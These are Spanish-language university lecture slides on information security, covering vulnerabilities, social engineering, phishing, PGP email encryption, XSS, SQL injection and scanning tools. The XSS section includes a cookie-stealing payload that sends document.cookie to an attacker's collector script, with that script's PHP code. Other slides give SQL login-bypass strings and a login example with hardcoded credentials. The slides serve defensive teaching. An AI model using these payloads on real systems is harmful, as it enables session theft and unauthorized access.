SlideShare a Scribd company logo
1 of 114
Download to read offline
Experto en gestión de
seguridad de la información
          JORNADA 2

             ramos valcárcel, david
                      david@uvigo.es
Seguridad de la información
1.   En vuestra empresa, vida diaria, que problemas de seguridad apreciáis

2.   Estáis preparados ante vulnerabilidades físicas

3.   Cada cuanto tiempo hacéis copias de seguridad y dónde las guardáis

4.   Creéis que sois vulnerables a la ingeniería social

5.   Empleáis el email para enviar información confidencial

6.   En donde creéis que debemos invertir más en seguridad
     Infraestructuras – hardware – software – personal

7.   De 0 a 10, que importancia le dais a la información que manejáis en la
     empresa

8.   De 0 a 10, como consideráis de seguras vuestras contraseñas

9.   Se puede hacer un sistema 100% seguro
Seguridad de la información
p   Protección de la información y de los
    sistemas de información contra

    n   Acceso indebido

    n   Uso, negligente o no

    n   Divulgación

    n   Interrupción

    n   Destrucción no autorizada
Seguridad de la información
p   Conceptos básicos
    n   Confidencialidad
         p   La información solo debe ser legible para personal autorizado
         p   Evita que exista una intercepción de esta y que pueda ser leída por
             una persona no autorizada
Seguridad de la información
p   Conceptos básicos

    n   Disponibilidad
         p   Garantiza el acceso


    n   Irrefutabilidad
         p   No se puede negar la autoría


    n   Autenticación
         p   Solo individuos autorizados tienen acceso a los recursos
Seguridad de la información
p   Conceptos básicos
    n   Integridad
         p   Garantizar que los datos sean los que se suponen que son
             y no se hayan alterados in situ o durante una transmisión
Seguridad de la información

 Existe la seguridad absoluta???
Seguridad de la información
p Todo es vulnerable si se     aplica
 aplica la fuerza justa




p Laúnica razón por la cual utilizamos
 rejas en nuestras casas es porque
 hace que el ataque sea más lento
Seguridad de la información

p   El coste de la seguridad aumenta
    exponencialmente a la necesidad de
    minimizar el riesgo

p   Un hacker puede gastar una ínfima parte en
    intentar vulnerar un sistema de lo que cuesta
    evitar el ataque

p   Las empresas asumen riesgos
    a fin de minimizar costes
Seguridad de la información

p   Objetivo:
    p   Obtener un factor coste/riesgo asumible


p   Una máxima:
    p   El sistema de seguridad no puede ser más valioso
        que el sistema o los datos que protege


p   Existen documentos, directrices y
    recomendaciones para establecer políticas de
    seguridad adecuadas
Seguridad de la información



    VULNERABILIDAD
Seguridad de la información
p   Vulnerabilidad

n   Es la posibilidad de que una amenaza se materialice sobre
    un activo

n   Las amenazas pueden desencadenar incidentes en:
        p   La organización
        p   Los procedimientos
        p   Equipos
        p   Software
        p   Información
Seguridad de la información
p   Analogía con el mundo real:




p   En el mundo informático el funcionamiento es muy
    similar

p   Existe un agujero de seguridad y mientras éste
    permanezca abierto estaremos predispuestos a sufrir
    un ataque.
Seguridad de la información
p   Ciclo de vida de una vulnerabilidad:
    n   Supongamos que se ha descubierto una vulnerabilidad
    n   Es de dominio público y aún no hay disponible ni solución
        ni parche
Seguridad de la información
p   Ciclo de vida de una vulnerabilidad:

    1.   Creación:
          p   no intencionada en la creación o actualización de un
              producto
          p   error en el desarrollo o descuido en la configuración.

    2.   Descubrimiento y publicación:
          p   Webs que ofrecen información diaria sobre las últimas
              vulnerabilidades y cuentan con extensas BD:
          p   National Vulnerability Database (EN)
               § http://nvd.nist.gov/
          p   SecurityFocus (EN)
               § http://www.securityfocus.com/vulnerabilities
          p   Secunia (EN)
               § http://secunia.com/advisories/historic/
Seguridad de la información
p   Ciclo de vida de una vulnerabilidad:

    3.   Explotación de la vulnerabilidad:
          p   se intenta desarrollar programas que automaticen el
              proceso.
    4.   Desarrollo de solución o parche:
          p   se desarrolla una solución efectiva y permanente al agujero
              de seguridad.

    Entre las distintas posibilidades:
          p   Publicación por parte del fabricante de un parche o
              actualización del producto
          p   Métodos de prevención temporales o no oficiales como
              la publicación de un parche independiente del fabricante, el
              cierre de puertos, la desactivación de servicios, etc.
Seguridad de la información
p   Ciclo de vida de una vulnerabilidad:

    5.   Difusión de la actualización:
          p   Finaliza la existencia del defecto de seguridad
          p   Masivamente a través de mecanismos de actualización
              automática así como de una integración total con el
              producto afectado


Nueva “actualización” posible nueva vulnerabilidad?
Seguridad de la información
p   Qué tipos de vulnerabilidades existen


                                Los ataques se
                                pueden producir en
                                cada eslabón de esta
                                cadena, siempre y
                                cuando exista una
                                vulnerabilidad que
                                pueda aprovecharse
Seguridad de la información
p   Tipos de vulnerabilidades
    n   Vulnerabilidad Física: el atacante tiene posibilidad de
        entrada o acceso físico a las instalaciones e incluso a los
        equipos:
         p   Interrupción del suministro eléctrico.
         p   Apagado manual del equipo.
         p   Vandalismo.
         p   Apertura de la carcasa del equipo y robo del disco duro.
         p   Monitorización del tráfico de red.
    n   Vulnerabilidad Natural: se refiere al grado en que el
        sistema puede verse afectado por desastres naturales o
        ambientales que pueden dañar el sistema:
         p   Fuego            Rayos               Terremotos
         p   Inundaciones     Fallos eléctricos   Picos de tensión
Seguridad de la información
p   Tipos de vulnerabilidades

    n   Vulnerabilidad del Hardware y del Software: ciertos
        tipos de dispositivos requieren la posesión de algún tipo
        de herramienta o tarjeta para poder acceder a los
        mismos
         p   Bugs de los sistemas operativos
         p   Bugs en software en general


    n   Vulnerabilidad por emanación: los dispositivos
        eléctricos y electrónicos emiten radiaciones
        electromagnéticas
Seguridad de la información
p   Centrándonos en vulnerabilidades de Software:

    n   De configuración: es una vulnerabilidad no del diseño
        del mismo sino del usuario.
         p   Se considera error cuando la configuración por defecto es
             insegura
         p   Ej.: aplicación recién instalada con usuario por defecto
    n   Gestión de credenciales: tiene que ver con la gestión
        de usuarios, contraseñas y los ficheros que los
        almacenan
    n   Permisos, privilegios y/o control de acceso: ocurre
        cuando el acceso o asignación de permisos es
        defectuoso
         p   Se trata del sistema y no del administrador
Seguridad de la información
p   Centrándonos en vulnerabilidades de Software:
    n   Validación de entrada
         p   se produce cuando la entrada que procesa un sistema no
             es comprobada adecuadamente
    n   Salto de directorio
         p   es la falta de seguridad de un servicio de red para
             desplazarse por el árbol de directorios hasta la raíz del
             sistema. Podrá desplazarse para ejecutar una utilidad de
             forma remota
    n   Seguimiento de enlaces
         p   cuando no existe una protección bastante robusta para
             evitar el acceso a un directorio desde un enlace simbólico o
             acceso directo
    n   Por puertas trampa/traseras
         p   son entradas ocultas en un programa de software que
             permite el acceso
Seguridad de la información
p   Centrándonos en vulnerabilidades de Software:

    n   Por intrusiones: existen diversos tipos:

         p   Análisis de puertos
         p   Elevación de privilegios: consiste en enviar una solicitud
             específica. En ciertos casos, esto genera comportamientos
             atípicos.
              § desbordamiento de búfer: se desborda cuando de forma
                incontrolada intenta meter más datos de los que caben. Son
                defectos de programación y existen lenguajes que lo evitan
              § agotamiento del búfer: cuando un búfer usado para
                comunicarse entre 2 dispositivos se alimenta con datos a una
                velocidad mas baja de la que lee
         p   Ataques malintencionados (virus, gusanos, troyanos).
Seguridad de la información
p   Centrándonos en vulnerabilidades de Software:

    n   Secuencia de comandos en sitios cruzados (XSS):
        abarca cualquier ataque que permite ejecutar código de
        scripting (Ej.: javascript) en el contexto de otro dominio.
         p   Aplicaciones HTML
         p   Navegadores

    El problema radica en incorrecta validación de los datos de
       entrada: hay 2 tipos:

         p   Indirecta: modifica valores que la aplicación web utiliza
             para pasar variables entre paginas, sin sesiones (URL)
         p   Directa: localiza puntos débiles en la programación de
             filtros (Formularios)
Seguridad de la información
p   Centrándonos en vulnerabilidades de Software:

    n   SQL Injection: está en el nivel de BD de una
        aplicación.
         p   Consiste en insertar un trozo de código SQL dentro de otro
             con el fin de modificar su comportamiento.
         p   Se realiza una consulta con parámetros dados por el
             usuario y dentro de esos datos estaría el código malicioso


    n   Por denegación de servicio: interrumpir el
        funcionamiento normal de un servicio.
         p   Las denegaciones de servicio se dividen:
              § Explotación de las debilidades del protocolo TCP/IP.
              § Explotación de las vulnerabilidades del software del servidor.
Seguridad de la información
p   Centrándonos en vulnerabilidades de Software:

    n   Inyección de código: Existen distintos subtipos:

         p   Inyección directa de código estático
              § Código en el contenido de las páginas
              § Permanente
              § Solución usar listas negras y listas blancas
         p   Evaluación directa de código dinámico
              §   Código en contenido dinámico
              §   No permanente
              §   Necesidad de crear funciones
              §   Solución usar listas negras y listas blancas
         p   Inclusión remota de archivos PHP
              § Uso de la función include() o require() que permite enlazar
                archivos en otros servidores
              § Si en el include/require incorporamos variables o funciones que
                puedan ser alteradas
Seguridad de la información



  INGENIERÍA SOCIAL
Seguridad de la información
p   La mayor parte de los ataques exitosos son total
    o parcialmente debidos a Ingeniería Social

p   Kevin Mitnick “Condor” es considerado el primer
    hacker que la usó. (Doc: Freedom downtown)
    n   “El factor determinante es interpretar correctamente
        las políticas de seguridad y hacerlas cumplir”
    n   Los ataques de ingeniería social (teléfono o email), son
        basados en cuatro principios básicos y comunes a las
        personas:
         p   Todos queremos ayudar
         p   Somos confiados
         p   No nos gusta decir No
         p   A todos nos gusta que nos alaben
Seguridad de la información
p   Ingeniería social

    n   Consiste en la manipulación de las
        personas para que voluntariamente
        realicen actos que normalmente no harían

    n   Se convierte en el método de ataque más
        sencillo, menos peligroso para el atacante
        y por desgracia en uno de los más
        efectivos

    n   Aprovecha el desconocimiento de unas
        mínimas medidas de seguridad
Seguridad de la información
p   Ingeniería social


    Ah, también
    gestiono una red.         Nunca pude
    ¿Cómo configura           pensar en
    sus firewalls?            una buena
                              contraseña.
                              ¿Qué utiliza
                              usted?
Seguridad de la información
p   Ingeniería social - Phishing
                Phisher se                 Phisher utiliza la
                prepara para               información para
                atacar                     suplantar a víctima


     Phisher envía mail
     fraudulento a
     victimas




                                           Información
    Víctima sigue                          confidencial es
    indicaciones de                        enviada al Phisher
    phisher

                      Víctima compromete
                      información
                      confidencial
Seguridad de la información
p   Ejemplos Ingeniería social

    n   correo electrónico:

    From: Super-User <root@sistema.com>
    To: Usuario <user@sistema.com>
    Subject: Cambio de clave
    Hola, Para realizar una serie de pruebas orientadas a
      conseguir un optimo funcionamiento de nuestro
      sistema, es necesario que cambie su clave mediante la
      orden 'passwd'. Hasta que reciba un nuevo aviso
      (aproximadamente en una semana), por favor, asigne a
      su contraseña el valor 'PEPITO' (en mayúsculas).
      Rogamos disculpe las molestias.
    Saludos, Administrador
Seguridad de la información
p   Ejemplos Ingeniería social

    n   Llamada telefónica (el atacante sabe el nombre de cuenta):

    Administrador: Buenos días, aquí área de sistemas, en qué podemos
       ayudarle?

    Atacante: Hola, soy José Luis Pérez, llamaba porque no consigo
       recordar mi password en la máquina sistema.xx.es.

    Administrador: Un momento, me puede decir su nombre de usuario?

    Atacante: Sí, claro, es jlperez.
    Administrador: Muy bien, la nueva contraseña que acabo de
       asignarle es *****. Por favor, nada más conectar, no olvide
       cambiarla.

    Atacante: Por supuesto. Muchas gracias, ha sido muy amable.

    Administrador: De nada, un saludo.
Seguridad de la información
p   Ejemplos Ingeniería social

    n   http://www.youtube.com/watch?v=Ao20tAS3x3I

    n   http://www.youtube.com/watch?v=wiRuBZxMLss&feature=re
        lated (3 videos)

    n   http://www.youtube.com/watch?v=NgHYI4AUUPc

    n   http://www.youtube.com/watch?v=cm89EQCF5e8&feature=re
        lated
Seguridad de la información



         PHISHING
Seguridad de la información
p   Como funciona
    1.   Correo electrónico masivo
    2.   Correo electrónico phishing
    3.   Sitio Web fraudulento




p   Afecta principalmente
    n    instituciones financieras
    n    proveedores internet
    n    grandes tiendas
Seguridad de la información
p   Correo
    n   Remitente:

    Banco Bilbao Vizcaya Argentaria
    info@bbva.es


    n   Asunto:

    Aviso Importante


    n   Logotipo oficial
    n   Aviso de Phishing
    n   Derechos reservados
    n   Teléfono de contacto
Seguridad de la información



    Reconocerías una
       web falsa?
Seguridad de la información
Seguridad de la información
Seguridad de la información
Seguridad de la información
Seguridad de la información
p   Correo donde el INE hace un sondeo sobre
    satisfacción con los bancos
    1.   Damos la información
    2.   Nos redirige a la web oficial
Seguridad de la información
p 40% error incluso entre usuarios
 “tecnológicamente avanzados”


 www.bankofthevvest.com
     www.hatmail.com
 http://www.faccebook.es/
Seguridad de la información




p   http://www.phishtank.com/
    n   Facebook: http://faccebook.c.la/
    n   PayPal: http://www.phishtank.com/phish_detail.php?phish_id=916961
    n   Bank of America: http://www.phishtank.com/phish_detail.php?phish_id=916955
    n   Hotmail: http://www.phishtank.com/phish_detail.php?phish_id=916948
Seguridad de la información
p   Otros tipos de phishing

    n   Vía programa malicioso.
         p   Troyano que instala programa espía (en juegos y aplicaciones free)

    n   A través de ataque al navegador con vulnerabilidades
         p   Permite generar interfaces superpuestas sobre webs oficiales
         p   Muy difícil de detectar

    n   Scam: ofertas de trabajo para blanquear dinero

    n   Nuevas variantes:
         p   Vishing: con tecnología VoIp (Identificador de llamada falsificable)
         p   Smishing: usan SMS
         p   Spear phishing: el correo va al jefe (CEO)
               § Correo personalizado
               § No usan correo masivo
Seguridad de la información
p   Tendencias

    n   A la profesionalización
         p   Ataques sofisticados y difíciles de detectar
         p   Difícil identificar interfaces falsas
         p   Simulación de URL
         p   Ataques sobre DNS


    n   Siguen funcionando los ataque simples e ingeniería
        social de nivel bajo

    n   Cada vez más las pequeñas empresas afectadas
Seguridad de la información
p   Prevención

    n   Su usuario, contraseña, pin, firma, etc. son datos de
        carácter personal y estrictamente confidenciales

    n   Desconfíe de cualquier toma de datos personales realizada
        a través de Internet fuera de su sitio web seguro.

    n   No dé nunca información personal o financiera en respuesta
        a un e-mail

    n   No utilice los enlaces incorporados en e-mails o páginas
        Web de terceros

    n   Cuidado con los adjuntos (exe, doc, xls…)

    n   Educación y mucha cultura de seguridad
Seguridad de la información



COMO PROTEGERNOS
Seguridad de la información
p ¿Cómo nos protegemos de la forma
 más eficiente posible?

  1.   Determinando que queremos proteger
       (ej: Hardware, datos, comunicaciones, sistemas, etc.)
  2.   Estableciendo prioridades de los
       factores a proteger
  3.   Creando políticas de seguridad
  4.   Manteniendo la seguridad en el tiempo
Seguridad de la información
p Debemos      enfocarnos en
  n   reducir el riesgo, no en tratar de
      eliminar las amenazas, ya que es
      imposible.


p Para   eso debemos saber
  n de qué o quiénes nos protegemos
  n cómo nos atacan.
Seguridad de la información
p   Pocos ataques tienen éxito sin una preparación
    previa: Infiltrado de programas, recopilación de
    información sobre usuarios, claves, etc.

p   Un sistema de seguridad es tan fuerte como su
    eslabón más débil

p   Para poder defender nuestros sistemas, es necesario
    conocer la forma en que los atacantes actúan y
    cuáles son sus armas

“El único sistema que está seguro es el que se encuentra
    debidamente apagado y dentro de una caja ignifuga”
                      (Gene Spafford)
Seguridad de la información

                          Ataques
                     organizativos
                                     Hackers




                                                         Ataques
    Datos restringidos                                automatizados



                                     DoS
  Infracciones
  accidentales                         Errores de conexión
 de la seguridad

                                               Denegación de
                          Virus,               servicio (DoS)
              caballos de Troya
                     y gusanos
Seguridad de la información
p Estrategias       de seguridad

  n   Proactivas (proteger y proceder)
       p Se basan en la prevención de ataques
       p Reducir al mínimo la cantidad de puntos
         vulnerables
       p Desarrollar planes de contingencia



  n   Reactivas (perseguir y procesar)
       p Posterior al ataque
       p Evaluar ataque, reparar e implementar plan de
         contingencia, documentar y aprender
Seguridad de la información
p Estrategias          de seguridad

Con respecto a la postura en recursos compartidos

  n   Lo que no se permite está expresamente
      prohibido
       p   El sistema está perfectamente delimitado


  n   Lo que no se prohíbe está permitido
       p   Menos restrictiva y favorecida por la imposibilidad de
           políticas de restricción a medida para todos los
           posibles casos
Seguridad de la información
p Estrategias            de seguridad
     Datos                       Encriptación
                                 Seguridad de programas y
     Aplicación                  servicios
                                 Fortalecer el sistema operativo,
     Host                        autenticación
                                 Marketing, Ventas, Finanzas,
     Red interna                 encriptar datos de red
                                 Oficina principal, oficina sucursal,
     Perímetro                   socio de negocios. Firewall
    Seguridad física             Protecciones, seguros,
                                 dispositivos de seguimiento
   Políticas, procedimientos y   Documentos de seguridad,
   conciencia                    educación del usuario
Seguridad de la información
p   Debemos formar al usuario:

             Cultura de seguridad

             Formatos potencialmente peligrosos

             No abrir archivos no solicitados

             No utilizar fuentes no confiables

             Navegación segura

             Política de passwords

             Copias de seguridad
Seguridad de la información



   FIRMA Y CIFRADO
      DE CORREO
Seguridad de la información
p   Cifrar: Alterar el contenido para que sólo los destinatarios puedan
    entenderlo

p   Firmar: permite al destinatario comprobar que el mensaje no fue
    modificado en el camino y que lo que lee es exactamente lo que se
    envió

p   Como lo hacemos

         p   Clave pública:
               §   La conocen sólo los destinatarios
               §   Permite a la gente verificar nuestra firma y crear mensajes cifrados para nosotros.
               §   Para enviar correos cifrados


         p   Clave privada:
               §   Sólo la conoce el emisor
               §   Permite firmar y descifrar correo
               §   Para enviar correos firmados


         p   no se puede averiguar una a través de la otra.
Seguridad de la información
p   Ejemplo de firma
Seguridad de la información
p   Ejemplo de cifrado
Seguridad de la información
p   Cifrado con PGP (GNU Privacy Guard)
    n   Aplicación de cifrado asimétrico libre
    n   http://www.gnupg.org/
    n   ftp://ftp.gnupg.org/gcrypt/binary/ (windows)
    n   http://macgpg.sourceforge.net/(mac)

         p   Instalamos PGP

p   Necesitamos un cliente de correo
    n   Thunderbird
    n   http://es-es.www.mozillamessaging.com/es-
        ES/thunderbird/

p   Necesitamos un software de cifrado y autenticación
    n   Enigmail 1.0.1
    n   https://addons.mozilla.org/es-ES/thunderbird/addon/71
    n   Instalamos: ThunderbirdàHerramientasàComplementos
    n   Genera nueva opción de menú OpenPGP
Seguridad de la información
p   Generar las claves
    n   OpenPGP à Administración de claves

    n   En el administrador de claves

         p   Generar à Nuevo par de claves
         p   Generar certificado de revocación

p   Configuración de las claves
    n   En la configuración de la cuenta : activar soporte
        OpenPGP

p   Subir claves públicas a
    n   http://www.rediris.es/cert/servicios/keyserver/
Seguridad de la información
p   Encriptar con GMAIL
    n   Configurar el navegador “Conexión del navegador” para
        usar siempre https

    n   Instalamos PGP

    n   Usaremos Mozilla Firefox

    n   Instalamos el complemento para Firefox
         p   FireGPG
         p   http://es.getfiregpg.org/s/install
         p   Incompatible con FireFTP
         p   Reiniciar si es necesario

    n   Acceder a Gmail y firmar y cifrar a través de iconos
Seguridad de la información

AMENAZAS EN LA RED
Seguridad de la información
p   Existen 4 tipos de amenazas en la red:

    n   Interrupción: Hace que el objetivo del ataque se
        pierda, quede inutilizable o no disponible

    n   Interceptación: Consiste en acceder a un
        determinado objeto del sistema

    n   Modificación: Además de la interceptación, el
        objeto del ataque es modificado

    n   Fabricación: Modificación destinada a suplantar el
        objeto real
Seguridad de la información
Seguridad de la información
p Ataques          Internos
  n   Premeditación
  n   Descuido
  n   Ignorancia
  n   Indiferencia de las políticas de seguridad


p Ataques          externos
  n   Hackers, Crackers, Lammers, Script-Kiddies
  n   Motivaciones:
       p   Ranking, reto personal
       p   Robo de datos
       p   Pruebas (pen test), etc.
Seguridad de la información
p   Origen de las amenazas

    n   Personas: Piratas que buscan nivel de privilegios en un
        sistema. Además de conocimientos técnicos, usan
        tácticas como la Ingeniería Social y el Basureo.

    n   Personal de la organización: Cualquier empleado
        puede ser una amenaza. Pueden causar daños no
        intencionados, pero cuando lo hacen de forma
        intencionada son extremadamente dañinos

    n   Ex-empleados: Pueden tener motivos para Atacar

    n   Curiosos: Aunque se trata de ataques no destructivos,
        el borrado de huellas puede causar daños
Seguridad de la información
Seguridad de la información
p Hackers (expertos)
  n De sombrero blanco
     p Ayudan a mejorar los sistemas y tecnologías
       informáticas
     p Responsables de los protocolos informáticos
       y herramientas
     p Optimizan sistemas, prueban las tecnologías
       y aprenden con el objetivo de hacerlas mas
       eficientes y fiables
  n De sombrero negro (piratas)
     p Propósito siempre malicioso
Seguridad de la información
p   De sombrero negro (piratas)

    n   Script Kiddies (crashers, lamers, packet monkeys)
         p Jóvenes usuarios que usan programas
           encontrados en la red par dañar sistemas
         p Sin conocimientos y altamente incompetentes
         p   Lamer. Se utiliza con tono despectivo para describir a
             un hacker que no sigue las reglas de la comunidad, o
             que intenta pavonearse de sus hazañas y
             conocimientos.
    n   Phreakers
         p Usan la red telefónica para hacer llamadas gratis
Seguridad de la información
p De    sombrero negro (piratas)
  n   Caders: atacan sistemas de tarjetas (generalmente
      bancarias) para entender su funcionamiento y
      aprovechar sus vulnerabilidades

  n   Crackers: crean software para atacar sistemas
      informáticos o eliminar la protección anticopia del
      software con licencia

  n   Hacktivistas: Hackers con motivaciones ideologías
Seguridad de la información



         EN LA WEB
Seguridad de la información
p Servidores              y platatormas web
  n   Ataques internos
       p   Suplantación de identidad
       p   Sniffing (Incluso administradores pueden hacer sniffing.
           Sugerencia: CIFRAR)
       p   Robo de información. (Ej: para la competencia)
       p   Virus, Troyanos, Gusanos
       p   Espionaje: Trashing, Shoulder Surfing, Spyware, etc
       p   Keylogging - Keycatching

       p   KeyCatcher
Seguridad de la información
p   Trashing (basureo)
    n   Alfombrilla ratónà
Seguridad de la información
p Servidores               y platatormas web
  n   Ataques externos
       p   Ataques contra servicios WEB
             § Cross Site Scripting (XSS)
             § SQL Injection
             § Exploits: aprovecha una vulnerabilidad de SO, Sw y Hw
       p   Robo de Identidad
       p   Denegación de Servicio (DoS)
       p   SPAM
       p   VIRUS
       p   Phishing: ingeniería social, url mal escritas, webs
           simuladas
       p   Troyanos: software malicioso bajo una apariencia
           inofensiva
Seguridad de la información



 CROSS SITE SCRIPTING
              XSS
Seguridad de la información
p   Servidores y platatormas web

    n   Cross Site Scripting (XSS)
         p   Aprovecha la falta de mecanismos de filtrado en los
             campos de entrada
         p   Permiten insertar y enviar datos sin validación alguna,
             aceptando el envió de scripts completos
         p   Pueden generar secuencias de comandos maliciosas que
             impacten directamente en el sitio o en el equipo de un
             usuario
         p   Sentencias ocultas en el código: en enlaces, formularios…
         p   Se usa el correo electrónico para enviarlos
         p   Se usan blogs, foros, libros de visitas…
Seguridad de la información
p   Ejemplos Cross Site Scripting (XSS)

    Supongamos que un sitio web tiene la siguiente forma:
    http://www.example.com/home.asp?frame=menu.asp

    En este ejemplo, ¿qué pasaría si se pone como URL del
    frame un código javascript?

    javascript:while(1)alert("Este mensaje saldrá
      indefinidamente");
Seguridad de la información
p   Ejemplos Cross Site Scripting (XSS)

Un atacante aprovecha la vulnerabilidad de nuestro sitio y publica una imagen
   de la siguiente manera:
    http://www.mipagina.com/mifoto.jpg name="foto“
    onload="foto.src='http://www.mipagina.com/foto.php?
    galleta='%20+document.cookie;">


    Código de foto.php.
    <? $migalleta = $_REQUEST[galleta];
    $file=fopen("cookies.txt", "a");
    fput($file, "$migalletan");
    fclose($file); ?>


    La variable que contiene las cookies galleta del usuario será almacenada
    en un documento de texto llamado cookies.txt alojado en el servidor del
    atacante
Seguridad de la información
p   Defensa Cross Site Scripting (XSS)
    n   Url
         p    Evitar llamadas a servidores externos
         p    Evitar parámetros susceptibles (sql, datos privados…)
    n   En formularios:
         p    Limitar la longitud de los campos de entrada MaxLength
         p    Validar los campos (expresiones regulares)
    n   Cookies
         p    Evitar almacenar datos susceptibles
                § Nombre usuario y contraseña
                § Tarjetas, cuentas bancarias …
         p    Encriptar todas las cookies de nuestro sitio
    n   Usar SSL (Secure Socket Layer)
         p    No es 100% seguro contra XSS pero ayuda
Seguridad de la información



     SQL INJECTION
Seguridad de la información
p   SQL Injection

    n   Filtrado incorrecto de las variables utilizadas en las
        partes del programa con código SQL.
    <% usuario=request.form("usuario")
       pass=request.form("pass")
       sql="SELECT * FROM usuarios WHERE user='" & usuario & "'
      and password='" & pass & "'“ %>
         p     El usuario teclea en el formulario
             usuario:" a' or true ‘"
             contraseña: " a' or true ‘“

    n   La cadena resultado sería
         SELECT * FROM users WHERE user='a' or true and pass='a' or true
    n   Otro ejemplo
         SELECT * FROM users WHERE user = ‘root' AND password='' OR ''='‘ --
Seguridad de la información
p   SQL Injection
    n   Mas peligroso
         p   Se pueden concatenar sentencias de modificación,
             insertado y borrado de datos o de tablas

    n   Solución:
         p   No usar usuario root para acceso a las BBDD
         p   Validar el contenido y longitud de los campos
         p   Usar procedimientos almacenados
         p   Evitar es que, al formar la cadena SQL, ésta tenga un
             "sentido" distinto al esperado = Eliminar comillas

         $query_result = mysql_query("SELECT * FROM usuarios
         WHERE nombre = "" .
         mysql_real_escape_string($nombre_usuario) . """);
Seguridad de la información



   AUTENTIFICACIÓN
Seguridad de la información
p   Autentificación de usuarios en la web

    n   Se emplean sesiones
         p   Son variables globales que nos permiten almacenar
             datos que necesiten volver a ser usados en otros
             accesos a la pagina


    n   Pasos
         p   Se crea el formulario de validación (login.php)
         p   Se comprueba la validez del usuario
             (autenticacion.php)
         p   Se crea la sesión y se da acceso al usuario o se
             deniega el mismo
Seguridad de la información
Seguridad de la información
p   Sesiones (autenticacion.php)
    <?php

         //vemos si el usuario y contraseña son válidos
         if ($_POST["usuario"]=="usuario" && $_POST["contrasena"]=="123"){
           //usuario y contraseña válidos

             session_start();
             $_SESSION["autenticado"]= "SI";

             // seguridad almacenando sesion_id()
             $_SESSION[“id_misesion"]= session_id();

             header ("Location: aplicacion.php");

         }else {

             //si no existe se va a login.php
             header("Location: login.php?errorusuario=si");
         }

    ?>
Seguridad de la información
p   Sesiones (seguridad.php)

    <?php

         //Inicio la sesión
         session_start();

         //COMPRUEBA QUE EL USUARIO ESTA AUTENTICADO
         if ($_SESSION["autenticado"] != "SI") {
         //si no existe, va a la página de autenticacion
         header("Location: login.php");

         //salimos de este script
         exit();
         }
    ?>

    n    Este código lo incluimos en todas las páginas que requieran validación
Seguridad de la información



     HERRAMIENTAS
Seguridad de la información
p   GFI LANguard :

    n   Escanea redes e informa de:

         p   El nivel de service pack de cada máquina, falta de parches
             de seguridad, recursos compartidos, puertos abiertos,
             servicios/ aplicaciones activas en el equipo, datos del
             registro, passwords débiles, usuarios y grupos, puntos de
             acceso wireless, dispositivos USB ...
         p   Escanea los resultados y los guarda en documentos HTML,
             sobre los que se puede consultar la información
         p   Existe una versión gratuita que está disponible para su
             prueba y uso no comercial durante 30 días


    http://www.gfi.com/lannetscan
Seguridad de la información
p   eEye retina:

    n   Su función es explorar todas las maquinas de una red e
        informar sobre cualquier vulnerabilidad encontrada

    n   Esta muy distribuida en el mercado, es sencilla y rápida
        para el escaneo de vulnerabilidades

    http://www.eeye.com/Products/Retina.aspx
Seguridad de la información
p   Nikto:

     n   Nikto es un escáner de servidores Web
     n   Open source (GPL)
     n   Busca más de 2000 archivos/CGIs potencialmente peligrosos y
         problemas en más de 200 servidores.
     n   Tiene la capacidad de no sólo probar vulnerabilidades de CGI
         sino también que lo hace de forma evasiva, evitando los
         sistemas de detección de intrusos.
     n   Viene con una documentación muy completa, la cual es
         recomendable revisar antes de ejecutar el programa.
     n   Es una buena herramienta pero limitada por su uso de
         Whisker/ libwhisker, debido a la falta de actualizaciones de
         esta última, por lo que las vulnerabilidades más críticas no son
         detectadas

    http://www.cirt.net/nikto2
    http://www.madirish.net/?article=216 (cómo instalar en windows)
Seguridad de la información
p   WebScarab

    n   Herramienta que permite analizar aplicaciones que se
        comunican usando protocolos de comunicación Web
        como el HTTP y el HTTPS

    n   Almacena los resultados de sus escaneos

    n   Diseñada para permitir a un desarrollador de
        aplicaciones basadas en HTTP(S) a depurar los errores
        de implementación y permitir identificar
        vulnerabilidades en el sistema

    http://sourceforge.net/projects/owasp/files/WebScarab/
Seguridad de la información
p   Asociación de internautas
    n   Scanner on-line

    n   Realiza un escaneo en remoto de los ‘puertos bien conocidos’
        del sistema objeto del estudio

    n   Permite seleccionar los puertos que quieres analizar (hasta un
        máximo de 5 puertos)

    n   Devuelve como resultado únicamente el estado (abierto,
        cerrado) en el que se encuentran los puertos seleccionados
        previamente

    http://www.internautas.org/w-scanonline.php
Seguridad de la información
p Dr. Web

  n   Ofrece una herramienta On-line para el análisis
      en línea de direcciones de Internet en busca de
      código malicioso que pudiera estar inyectado en las
      páginas HTML.

  n   En el caso de ser así, nos avisará que el acceso a
      este sitio podría ser peligroso, ya que podría dañar
      la configuración del sistema, por lo que sería
      aconsejable no acceder a dicha URL.


  http://online.us.drweb.com/?url=1
Seguridad de la información
p LinkScanner

  n   Analiza URLs en línea o bajo demanda o si
      prefiere instalarla como herramienta de escritorio

  n   Realiza un análisis de los resultados de búsquedas
      Web con motores de Google, MSN y Yahoo, para
      determinar si las páginas mostradas en la
      búsqueda realizada contienen virus, software espía,
      explotan alguna vulnerabilidad o se utilizan con
      otros fines fraudulentos.

  http://linkscanner.explabs.com/linkscanner/default.aspx
Seguridad de la información
p Virus Total
  n   Servicio de análisis de archivos sospechosos que permite
      detectar virus, gusanos, troyanos, y malware en general

  n   Trabaja con los principales motores de antivirus y
      antimalware: Avast!, Avira, Quick Heal, Clamwin, NOD 32,
      AVG, Antivir, Ikarus, Panda Platinum, BitDefender, Norton
      Antivirus

  n   http://www.virustotal.com/
Seguridad de la información
p Nessus

  n   Es la herramienta de evaluación de vulnerabilidades
      para UNIX de mayor renombre

  n   Nessus quizás sea el mejor escáner de vulnerabilidades
      "Open Source" (GPL) que hay disponible en la red

  n   Se actualiza constantemente, con más de        11.000
      plugins gratuitos

  n   Nessus 3 ahora es de código cerrado, aunque de coste
      gratuito a menos que desees los plugins más recientes


  http://www.nessus.org
Seguridad de la información
p Nessus
  n   Basado en un modelo cliente/servidor que cuenta con
      su propio protocolo de comunicación
  n   El servidor explora y prueba ataques contra objetivos
      establecidos
  n   El cliente realiza las tareas de control, generación de
      informes y presentación de datos

  n   Consta de 4 ficheros básicos:
       p   Las librerías del programa
       p   Las librerías NASL (Nessus Attack Scripting Language)
       p   El núcleo de la aplicación
       p   Los plugins (gestionan los diferentes tipos de ataques)
Seguridad de la información
p Nessus
Seguridad de la información
  n   Las 75 Herramientas de Seguridad Más Usadas
       p   http://insecure.org/tools/tools-es.html


  n   packet sniffers para Ethernet/LAN :
       p Wireshark (anteriormente conocido como Ethereal ),

       p   Ettercap, TCPDump, WinDump, WinSniffer, Hunt, Darkstat,
           traffic-vis, KSniffer)
